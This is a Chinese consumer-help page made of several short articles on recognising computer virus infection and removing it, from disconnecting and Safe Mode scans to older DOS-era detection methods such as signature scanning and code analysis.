主页被篡改是早期病毒的主要攻击对象,计算机操作系统中毒后一般都会发生浏览器主页被篡改的现象,所以当年IE伴侣这款修复主页篡改的小软件挺受欢迎。如果同时伴有浏览器页面不停反复载入/刷新或无缘无故弹出广告,那么很有可能是中毒了
电脑中病毒的症状(十)应用程序图标被篡改或空白
计算机桌面的程序快捷方式图标或程序目录的主exe文件的图标被篡改或为空白,那么很有可能这个软件的exe程序被病毒或木马感染。小编印象中蠕虫病毒会进行此类感染修改
电脑中病毒后简单的处理方式:正在上网的用户,发现异常应首先马上断开连接
如果你发现IE经常询问你是否运行某些ACTIVEX控件,或是生成莫明其妙的文件、询问调试脚本什么的,一定要警惕了,你可能已经中招了。典型的上网被入侵有两种情况:
1、是浏览某些带恶意代码的网页时候被修改了浏览器的默认主页或是标题,这算是轻的;还有就是遇到可以格式化硬盘或是令你的windows不断打开窗口,直到耗尽资源死机??这种情况恶劣得多,你未保存和已经放在硬盘上的数据都可能会受到部分或全部的损失。
2、是黑客的潜在的木马发作,或是蠕虫类病毒发作,让你的机器不断地向外界发送你的隐私、或是利用你的名义和邮件地址发送垃圾,进一步传播病毒;还有就是黑客的手工入侵,窥探你的隐私或是删除破坏你的文件。
处理办法:马上断开连接,这样能将自己的损失降低的同时,也避免了病毒向更多的在线电脑传播。请先不要马上重新启动系统或是关机,进一步的处理措施请参看后文。
浏览量:3
下载量:0
时间:
电脑中毒一直是很多人的苦恼,安装三四个杀毒软件仍然会中毒,那么怎么杀电脑病毒呢?今天读文网小编与大家分享下杀电脑病毒的具体操作步骤,有需要的朋友不妨了解下。
我们电脑中毒的话,很多时候我们并不知道是否有中毒,我们可以根据下述情况确定我们电脑是否中毒的。
2 如果我们的电脑点击图标没有任何反应的话,或者系统无缘故的情况下重启,死机和崩溃,就有可能电脑中毒的。
3 如果我们检测到我们的电脑防护墙突然被禁止或者没有办法正常的进入到相关的驱动和磁盘的话,也有可能是中毒的。
4 电脑病毒其实就是计算机程序中的破坏插件的,通过破坏我们计算机正常运行从而威胁到我们电脑的安全。
安全软件杀毒
我们可以使用腾讯电脑管家对我们的电脑进行全面的查杀和体检,首先进入到腾讯电脑管家的杀毒界面中。
2进入到腾讯电脑管家相关的病毒查杀界面后,我们可以使用腾讯电脑管家对我们的电脑进行全面的查杀。
浏览量:3
下载量:0
时间:
当我们的电脑中毒后,我们可以选择使用电脑的杀毒软件或者手动进行杀毒,今天读文网小编给大家介绍下怎么杀死电脑病毒吧。
安全模式是Windows操作系统中的一种特殊模式。在安全模式下,Windows将不加载包括第三方软件的情况下启动电脑。对于感染不深的病毒就无法跟随系统的启动而启动,这样病毒就任杀毒软件宰杀了。
开机时不断按F8 可以选择进入安全模式,如果你的杀毒软件是带有云引擎的,请选择带网络的安全模式,这样云引擎将发挥重要的角色。
这里请选择确定,进入安全模式,安全模式将没有桌面背景和特效,不要为此而惊慌。
3跟普通模式开启杀毒软件进行全盘扫描。
浏览量:2
下载量:0
时间:
电脑中毒并不是罕见的现象,我们很多时候都会遇到电脑中毒的现象。那么如何杀电脑病毒呢?今天读文网小编与大家分享下杀电脑病毒的具体操作步骤,有需要的朋友不妨了解下。
不会制作PE启动盘,请参考我的经验中的制作Win7/win8 系统启动盘,方法是一样的。GHOST 系统光盘一般也会带有PE系统。
将PE 系统插入电脑,进入启动菜单或者BIOS ,选择U盘(如果使用光盘,则启动。
PE系统最好是带网络功能的,这样云杀毒才可以起作用。这里使用的是“完美PE”,在启动界面选择进入PE系统。
PE 系统的桌面跟普通系统的桌面基本相同,操作简单。进入之后,运行杀毒软件或急救箱杀毒即可。
由于PE 系统属于精简版的系统,并不是所有程序都可以在PE系统下运行。如急救箱必须使用PE系统版本的急救箱,本人所使用的PE系统自带杀毒软件。
浏览量:2
下载量:0
时间:
电脑中毒并不是罕见的现象,电脑中毒一直是很多人的苦恼,电脑病毒怎么杀不死?电脑病毒杀不死怎么办?下面跟着读文网小编来一起了解下吧。
病毒有很多种,怎么杀呢?
一般对硬盘进行病毒检测时,要求内存中不带病毒,因为某些电脑病毒会向检测者报告假情况。例如“4096”病毒在内存中时,查看被它感染的文件,不会发现该文件的长度已发生变化,而当在内存中没有病毒时,才会发现文件长度已经增lk了4096字节;又例如,“DIR2”病毒在内存中,用Debug程序查看被感染文件时,根本看不到“DIR2”病毒的代码,很多检测程序因此而漏过了被感染的文件;还有引导区型的“巴基斯坦智囊”病毒,当它活跃在内存中时,检查引导区就看不到病毒程序而只看到正常的引导扇区。因此,只有在要求确认某种病毒的类型和对其进行分析、研究时,才能在内存中带毒的情况下作检测工作。
从原始的、未受病毒感染的DOS系统软盘启动,可以保证内存中不带病毒。启动必须是上电启动而不是按键盘上的“Alt+Ctrl+Del”三键的那种热启动,因为某些病毒可以通过截取键盘中断,将自己驻留在内存中。检测硬盘中的病毒,启动系统软盘的DOS版本号应该等于或高于硬盘内DOS系统的版本号。如果硬盘上使用了硬盘管理软件DM、ADM,硬盘压缩存储管理软件Stacker、DoubleSpace等,启动系统软盘时应把这些软件的驱动程序包括在软盘上,并把它们写入config.sys文件中,否则用系统软盘引导启动后,将不能访问硬盘上的所有分区,使躲藏在其中的病毒逃过检查。
检测硬盘中的病毒可分成检测引导区型病毒和检测文件型病毒。这两种检测的原理上相同,但由于病毒的存储方式不同,检测方法还是有差别的。主要是基于下列四种方法:比较被检测对象与原始备份的比较法;利用病毒特征代码串进行查找的搜索法;搜索病毒体内特定位置的特征字识别法;运用反汇编技术分析被检测对象,确证是否为病毒的分析法。
比较法
这是用原始备份与被检测的引导扇区或被检测的文件进行比较的方法,可以用打印的代码清单(比如Debug的D命令输出格式)进行比较,也可用程序来进行比较(如DOS的DISKCOMP、COMP或PCTOOLS等其它软件)。比较法不需要专用的查病毒程序,只要用常规DOS软件和PCTOOLS等工具软件就可以进行,而且还可以发现那些尚不能被现有的杀毒软件发现的计算机病毒。因为病毒传播得很快,新病毒层出不穷,而目前还没有能查出一切病毒的通用程序,或通过代码分析,可以判定某个程序中是否含有病毒的查毒程序,所以只有靠比较法和分析法,或这两种方法相结合来发现新病毒。
对硬盘的主引导区或对DOS的引导扇区作检查,用比较法能发现其中的程序源代码是否发生了变化。由于要进行比较,因此保留好原始备份是非常重要的。制作备份时必须在无电脑病毒的环境里进行,制作好的备份必须妥善保管,写好标签,贴好写保护。比较法的好处是简单、方便,不用专用软件;缺点是无法确认病毒的种类名称。另外,造成被检测程序与原始备份之间差别的原因尚需进一步验证,以查明是电脑病毒造成的,还是DOS数据被偶然原因,如突然停电、程序失控、恶意程序等破坏的。这些要用到以后讲的分析法,查看变化部分代码的性质,以此来确认是否存在病毒。
搜索法
这种方法主要是对每一种病毒含有的特定字符串进行扫描,如果在被检测对象内部发现了某一种特定字节串,就表明发现了该字节串所代表的病毒。国外称这种按搜索法工作的病毒扫描软件为“Scanner”。这种病毒扫描软件由两部分组成:一部分是病毒代码库,含有经过特别选定的各种电脑病毒的代码串;另一部分是利用该代码库进行扫描的扫描程序,病毒扫描程序能识别的电脑病毒的数目完全取决于病毒代码库内所含病毒种类的多少。病毒代码串的选择是非常重要的,短小的病毒代码只有一百多个字节,长的也只有10KB字节。一定要在仔细分析程序之后选出最具代表特性的,足以将该病毒区别于其它病毒和该病毒的其它变种的代码串。一般情况下,代码串是由连续若干个字节组成的,但是有些扫描软件采用的是可变长串,即在串中包含有一个到几个“模糊”字节。扫描软件遇到这种串时,只要除“模糊”字节之外的字串都能完好匹配,就也能够判别出病毒。另外,特征串还必须能将病毒与正常的非病毒程序区,不然就会出现“假报、误报”。
分析法
这种方法一方面可以确认被观察的磁盘引导区和程序中是否含有病毒,另一方面可以辨认病毒的类型和种类,判定是否为一种新病毒,另外还可以搞清楚病毒体的大致结构,提取用于特征识别的字节串或特征字,增添到病毒代码库中供病毒扫描和识别程序使用。同时,详细地分析病毒代码,还有助于制定相应的反病毒方案。与前三种检测病毒的方法不同,使用分析法检测病毒,除了要具有相关的知识外,还需要使用Debug、Proview等分析工具程序和专用的试验用计算机。因为即使是很精通病毒的技术人员,使用性能完善的分析软件,也不能完全保证在短时间内将病毒代码分析清楚;而病毒则有可能在被分析阶段继续传染甚至发作,把软盘、硬盘内的数据完全毁坏掉,所以分析工作必须在专门的试验用PC机上进行,不怕其中的数据被破坏。不具备必要的条件,不要轻易开始分析工作。很多电脑病毒采用了自加密、抗跟踪等技术,使得分析病毒的工作经常是冗长枯燥的。特别是某些文件型病毒的源代码可达10KB以上,与系统的牵扯层次很深,使详细的剖析工作十分复杂。病毒检测的分析法是反病毒工作中不可或缺的重要技术,任何一个性能优良的反病毒系统的研制和开发都离不开专门人员对各种病毒详尽、认真的分析。
分析法分为静态和动态两种。静态分析是指利用Debug等反汇编程序将病毒代码打印成反汇编后的程序清单进行分析,看病毒分成哪些模块,使用了哪些系统调用,采用了哪些技巧,如何将病毒感染文件的过程翻转为清除病毒、修复文件的过程,哪些代码可被用做特征码以及如何防御这种病毒等等。分析人员的素质越高,分析过程就越快,理解也就越深;动态分析则是指利用Debug等程序调试工具在内存带毒的情况下,对病毒作动态跟踪,观察病毒的具体工作过程,以进一步在静态分析的基础上理解病毒工作的原理。在病毒编码比较简单的情况下,动态分析不是必须的。但是,当病毒采用了较多的技术手段时,就必须使用动、静相结合的分析方法才能完成整个分析过程。
综上所述,利用原始备份和被检测程序相比较的方法适合于不用专用软件,可以发现异常情况的场合,是一种简单、基本的病毒检测方法;扫描特征串和识别特性字的方法更适用于广大PC机用户使用,方便而又迅速;但对新出现的病毒会出现漏检的情况,须要与分析和比较法结合使用。
看过“电脑病毒怎么杀不死”
浏览量:2
下载量:0
时间: